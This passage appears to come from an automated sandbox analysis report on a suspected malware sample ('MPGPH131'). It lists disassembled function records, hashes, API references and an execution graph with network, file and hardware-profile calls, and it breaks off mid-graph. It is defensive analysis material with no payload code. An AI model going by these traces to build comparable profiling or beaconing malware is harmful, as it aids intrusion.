                                      • Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_destroy
                                      • String ID: at line $, column
                                      • API String ID: 4194217158-191570568
                                      • Opcode ID: dcd0f1b1e9dceb4bf7418138b0995b38554a973125db0126b28c8abff1197006
                                      • Instruction ID: cacc5ba0a5a996d98431dee7878d5519754ae1be669a52d33cb86c71b668c157
                                      • Opcode Fuzzy Hash: dcd0f1b1e9dceb4bf7418138b0995b38554a973125db0126b28c8abff1197006
                                      • Instruction Fuzzy Hash: EB610671A002049FDB08DF6CCC85BEDBBB9EF44300F148658E415A7792EB78AA80CB95
                                      APIs
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00B22BD6
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00B22BEF
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00B22D27
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00B22D40
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00B22EA6
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00B22EBF
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00B23709
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00B23722
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_destroy
                                      • String ID: value
                                      • API String ID: 4194217158-494360628
                                      • Opcode ID: 91abd5cb8b3f94f8c85e7a21865e5fa36d148b373a1e2f2be7aada1d6f59f45d
                                      • Instruction ID: ffac10b0a24f827730619cdf657bc7d0e1569dda3e1166fafd3e2a65356f412f
                                      • Opcode Fuzzy Hash: 91abd5cb8b3f94f8c85e7a21865e5fa36d148b373a1e2f2be7aada1d6f59f45d
                                      • Instruction Fuzzy Hash: F351B2B0C00258DBDF14EFA4DC85BDEBBF5AF05304F148299E449A7392D7786A89CB61
                                      APIs
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00AB3C0F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_copy
                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                      • API String ID: 2659868963-1866435925
                                      • Opcode ID: c487316624e53e978aac126d7693165d634547999407734f49dd5dc359a5fe24
                                      • Instruction ID: 0739dccd9c3407a504e68a4cf16a71caf3cdd6af09a9a34b08cde7136e8c99d6
                                      • Opcode Fuzzy Hash: c487316624e53e978aac126d7693165d634547999407734f49dd5dc359a5fe24
                                      • Instruction Fuzzy Hash: 1D11A1B39107056BCB10DF59C805FEAB7ECEB15310F0485AAFA589B242EBB0E954CB91
                                      Strings
                                      • unordered_map/set too long, xrefs: 00B221D3
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: unordered_map/set too long
                                      • API String ID: 0-306623848
                                      • Opcode ID: e492b31f5f669ad142f343393e775b2d5e762a9a566be8547cb71e983a5630a7
                                      • Instruction ID: bbb1e9ca95b4e0184069a13de1e76b94658dc4bb51ab48955b7e6b84f93918e1
                                      • Opcode Fuzzy Hash: e492b31f5f669ad142f343393e775b2d5e762a9a566be8547cb71e983a5630a7
                                      • Instruction Fuzzy Hash: BAE1DF71A002159FCB18DF6CD980AA9B7F5FF58310B1487AAE819EB395E730E951CB90
                                      APIs
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00AB844D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_copy
                                      • String ID: parse error$ror
                                      • API String ID: 2659868963-4201802366
                                      • Opcode ID: 692c3290f2abfedd09ec07fbf807eb618790878e4c84180b24abf1abed5c2507
                                      • Instruction ID: d43c678ab274cd5761bc621903ce1687b7dd8f9cdfc7598ea336ea5eddfe6553
                                      • Opcode Fuzzy Hash: 692c3290f2abfedd09ec07fbf807eb618790878e4c84180b24abf1abed5c2507
                                      • Instruction Fuzzy Hash: 11C1E671D10649CFEB08CF68CC85BEDBBB9BF55304F148298E4046B692DB78AAC5CB51
                                      APIs
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00AB8051
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00AB8060
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_destroy
                                      • String ID: [json.exception.
                                      • API String ID: 4194217158-791563284
                                      • Opcode ID: 5533e9a750fa8b0f9de7f3a5137d8c2dd1315e8c2a9dea56f413049c698e5331
                                      • Instruction ID: 8630a06e8e2aee912fb94001f68de88b748274701d2cecdcd5d6f867610bb145
                                      • Opcode Fuzzy Hash: 5533e9a750fa8b0f9de7f3a5137d8c2dd1315e8c2a9dea56f413049c698e5331
                                      • Instruction Fuzzy Hash: 9A91F8719002489FDB18DFA8CC85BEEFBB5FF55310F14425DE410AB6A2D7B4AA84C791
                                      APIs
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00AB3C0F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_copy
                                      • String ID: ios_base::badbit set$ios_base::failbit set
                                      • API String ID: 2659868963-1240500531
                                      • Opcode ID: 69129472d2e53d23d70879c2e87c796375444c0b9992db45d3852a671921ca22
                                      • Instruction ID: be276cec5dc05ded2f634cad82330c0762826ef62bacea1f31943f58c96ac631
                                      • Opcode Fuzzy Hash: 69129472d2e53d23d70879c2e87c796375444c0b9992db45d3852a671921ca22
                                      • Instruction Fuzzy Hash: 5541E5B2910604ABCB04DF59CC45BEEFBFCEF45310F14826AF91597682E774AA40CBA1
                                      APIs
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00B240B9
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00B240D2
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00B24BDD
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00B24BF6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_destroy
                                      • String ID: value
                                      • API String ID: 4194217158-494360628
                                      • Opcode ID: 738cdbf1779159359ee94492bbbe71161ea0b888b20e6201f36b531bfd716890
                                      • Instruction ID: f2c99f6967256b9b97284373e9eb589a1602f4c6bdbc425da636aecb584304a6
                                      • Opcode Fuzzy Hash: 738cdbf1779159359ee94492bbbe71161ea0b888b20e6201f36b531bfd716890
                                      • Instruction Fuzzy Hash: B651A270C00258DBDB14DFA8DC89BEEBBF4AF05304F144299E449A7792D7B46A88CF91
                                      APIs
                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00B28D11
                                      Strings
                                      • type must be string, but is , xrefs: 00B28D78
                                      • type must be boolean, but is , xrefs: 00B28E02
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Concurrency::cancel_current_task
                                      • String ID: type must be boolean, but is $type must be string, but is
                                      • API String ID: 118556049-436076039
                                      • Opcode ID: 9f1c1d3b2364b88e39171271f2d57d601c8c976901a81fdeb96f8797bca3df0b
                                      • Instruction ID: 61882282c4163500b2b5feb6d8c40b7bf04a05eb4ccf10286768d0b7e81822ca
                                      • Opcode Fuzzy Hash: 9f1c1d3b2364b88e39171271f2d57d601c8c976901a81fdeb96f8797bca3df0b
                                      • Instruction Fuzzy Hash: 7F3119B5900144AFDB14EBA4E842BDDB7E9EB14700F1006F9F419977D2EF74A948C752

                                      Execution Graph

                                      Execution Coverage:1.6%
                                      Dynamic/Decrypted Code Coverage:2%
                                      Signature Coverage:0%
                                      Total number of Nodes:247
                                      Total number of Limit Nodes:40
                                      execution_graph 24640 b2bd30 RtlAllocateHeap 24328 1050000 24330 1050044 GetPEB 24328->24330 24333 1050077 GetTempPathA 24330->24333 24332 105020b CreateFileA 24334 105022d 24332->24334 24333->24332 24336 acd620 WSAStartup 24337 acd658 24336->24337 24341 acd716 24336->24341 24338 acd6e4 socket 24337->24338 24337->24341 24339 acd6fa connect 24338->24339 24338->24341 24340 acd70c closesocket 24339->24340 24339->24341 24340->24338 24340->24341 24643 acdb20 6 API calls 24335 4fb0951 GetCurrentHwProfileW 24645 ab8b00 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy 24455 b99e88 24456 b99e9b ___std_exception_copy 24455->24456 24461 b99c6a 24456->24461 24458 b99eb0 24469 b911fc RtlAllocateHeap ___std_exception_copy 24458->24469 24460 b99ebd 24462 b99c78 24461->24462 24468 b99ca0 24461->24468 24463 b99c85 24462->24463 24464 b99ca7 24462->24464 24462->24468 24474 b91443 RtlAllocateHeap ___std_exception_copy __Getctype 24463->24474 24470 b99bc3 24464->24470 24467 b99cdf 24467->24458 24468->24458 24469->24460 24471 b99bcf std::locale::_Setgloballocale 24470->24471 24475 b99c1e 24471->24475 24473 b99bea 24473->24467 24474->24468 24482 ba5363 24475->24482 24481 b99c60 24481->24473 24499 ba5325 24482->24499 24484 b99c36 24489 b99ce1 24484->24489 24485 ba5374 24485->24484 24506 ba3b4d RtlAllocateHeap RtlAllocateHeap __dosmaperr std::_Facet_Register 24485->24506 24487 ba53cd 24507 ba3ad3 RtlAllocateHeap __dosmaperr 24487->24507 24492 b99cf3 24489->24492 24493 b99c54 24489->24493 24490 b99d01 24508 b91443 RtlAllocateHeap ___std_exception_copy __Getctype 24490->24508 24492->24490 24492->24493 24496 b99d37 std::_Locinfo::_Locinfo_ctor 24492->24496 24498 ba540e SetFilePointerEx WriteFile RtlAllocateHeap RtlAllocateHeap 24493->24498 24494 b922f1 4 API calls 24494->24496 24495 ba2ca2 RtlAllocateHeap 24495->24496 24496->24493 24496->24494 24496->24495 24497 ba20ab 4 API calls 24496->24497 24497->24496 24498->24481 24500 ba5331 24499->24500 24501 ba535b 24500->24501 24502 ba2ca2 RtlAllocateHeap 24500->24502 24501->24485 24503 ba534c 24502->24503 24504 bada74 RtlAllocateHeap 24503->24504 24505 ba5352 24504->24505 24505->24485 24506->24487 24507->24484 24508->24493 24509 b95908 24510 b9591b ___std_exception_copy 24509->24510 24515 b957e3 24510->24515 24512 b95927 24522 b911fc RtlAllocateHeap ___std_exception_copy 24512->24522 24514 b95933 24516 b957ef std::locale::_Setgloballocale 24515->24516 24517 b957f9 24516->24517 24520 b9581c 24516->24520 24537 b91443 RtlAllocateHeap ___std_exception_copy __Getctype 24517->24537 24519 b95814 24519->24512 24520->24519 24523 b9587a 24520->24523 24522->24514 24524 b958aa 24523->24524 24525 b95887 24523->24525 24527 b922f1 4 API calls 24524->24527 24536 b958a2 24524->24536 24549 b91443 RtlAllocateHeap ___std_exception_copy __Getctype 24525->24549 24528 b958c2 24527->24528 24538 ba3b0d 24528->24538 24531 ba2ca2 RtlAllocateHeap 24532 b958d6 24531->24532 24542 ba175f 24532->24542 24536->24519 24537->24519 24539 ba3b24 24538->24539 24541 b958ca 24538->24541 24539->24541 24551 ba3ad3 RtlAllocateHeap __dosmaperr 24539->24551 24541->24531 24543 ba1788 24542->24543 24548 b958dd 24542->24548 24544 ba17d7 24543->24544 24546 ba17af 24543->24546 24556 b91443 RtlAllocateHeap ___std_exception_copy __Getctype 24544->24556 24552 ba16ce 24546->24552 24548->24536 24550 ba3ad3 RtlAllocateHeap __dosmaperr 24548->24550 24549->24536 24550->24536 24551->24541 24553 ba16da std::locale::_Setgloballocale 24552->24553 24555 ba1719 24553->24555 24557 ba1832 24553->24557 24555->24548 24556->24548 24558 ba7400 RtlAllocateHeap 24557->24558 24560 ba1842 24558->24560 24561 ba7400 RtlAllocateHeap 24560->24561 24566 ba1848 24560->24566 24568 ba187a 24560->24568 24563 ba1871 24561->24563 24562 ba7400 RtlAllocateHeap 24564 ba1886 FindCloseChangeNotification 24562->24564 24565 ba7400 RtlAllocateHeap 24563->24565 24564->24566 24565->24568 24569 ba736f RtlAllocateHeap __dosmaperr 24566->24569 24567 ba18a0 24567->24555 24568->24562 24568->24566 24569->24567 24574 b92080 24577 b91fbe 24574->24577 24576 b92092 24580 b91fca std::locale::_Setgloballocale 24577->24580 24578 b91fd1 24595 b99f5f RtlAllocateHeap __dosmaperr 24578->24595 24580->24578 24582 b91ff1 24580->24582 24581 b91fd6 24596 b914c0 RtlAllocateHeap ___std_exception_copy 24581->24596 24584 b92003 24582->24584 24585 b91ff6 24582->24585 24591 ba33a8 24584->24591 24597 b99f5f RtlAllocateHeap __dosmaperr 24585->24597 24588 b9200c 24590 b91fe1 24588->24590 24598 b99f5f RtlAllocateHeap __dosmaperr 24588->24598 24590->24576 24592 ba33b4 std::_Lockit::_Lockit std::locale::_Setgloballocale 24591->24592 24599 ba344c 24592->24599 24594 ba33cf 24594->24588 24595->24581 24596->24590 24597->24590 24598->24590 24603 ba346f 24599->24603 24601 ba34d0 24609 ba3ad3 RtlAllocateHeap __dosmaperr 24601->24609 24603->24603 24604 ba34b5 24603->24604 24605 ba3113 24603->24605 24604->24594 24608 ba3120 __dosmaperr std::_Facet_Register 24605->24608 24606 ba314b RtlAllocateHeap 24607 ba315e __dosmaperr 24606->24607 24606->24608 24607->24601 24608->24606 24608->24607 24609->24604 24652 ac4560 GetPEB RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 24288 b179d0 24289 b17a17 24288->24289 24292 b179e8 std::locale::_Setgloballocale 24288->24292 24293 b1acb0 24289->24293 24291 b17a2a 24294 b1acd5 24293->24294 24295 b1adfc 24293->24295 24298 b1ad43 24294->24298 24299 b1ad36 24294->24299 24301 b1acea 24294->24301 24316 ab2040 RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 24295->24316 24297 b1ae01 24317 ab1fa0 RtlAllocateHeap RtlAllocateHeap Concurrency::cancel_current_task ___std_exception_copy 24297->24317 24304 b8bfb1 std::_Facet_Register 2 API calls 24298->24304 24306 b1acfa std::_Locinfo::_Locinfo_ctor std::locale::_Setgloballocale 24298->24306 24299->24297 24299->24301 24308 b8bfb1 24301->24308 24304->24306 24307 b1adba std::_Locinfo::_Locinfo_ctor std::locale::_Setgloballocale 24306->24307 24318 b914d0 RtlAllocateHeap ___std_exception_copy __Getctype 24306->24318 24307->24291 24309 b8bfb6 std::_Facet_Register 24308->24309 24311 b8bfd0 24309->24311 24313 ab1fa0 Concurrency::cancel_current_task 24309->24313 24319 b9ac4c 24309->24319 24311->24306 24312 b8bfdc 24312->24312 24313->24312 24325 b8d371 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy 24313->24325 24315 ab1fe3 24315->24306 24316->24297 24317->24306 24321 ba3b4d __dosmaperr std::_Facet_Register 24319->24321 24320 ba3b8b 